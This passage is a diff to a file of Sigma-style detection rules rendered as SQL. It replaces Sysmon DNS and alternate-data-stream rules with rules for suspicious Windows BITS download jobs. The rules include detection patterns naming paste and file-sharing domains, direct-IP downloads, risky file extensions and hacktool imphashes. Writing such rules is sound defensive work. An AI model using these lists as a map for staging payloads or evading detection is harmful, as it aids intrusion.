Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. 
domain controllers dc01.company.co.uk)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "title": "New BITS Job Created Via Bitsadmin", + "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "description": "Detects the creation of a new bits job by Bitsadmin", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Many legitimate applications or scripts could leverage \"bitsadmin\". 
This event is best correlated with EID 16403 via the JobID field" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_bits_client_new_job_via_bitsadmin.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "author": "frack113", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE 
'%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "New BITS Job Created Via PowerShell", + "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new bits job by PowerShell", + "author": "frack113", "tags": [ "attack.defense_evasion", - 
"attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 
'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE 
'\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_job_via_powershell.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE 
'%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data 
Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": 
"create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE 
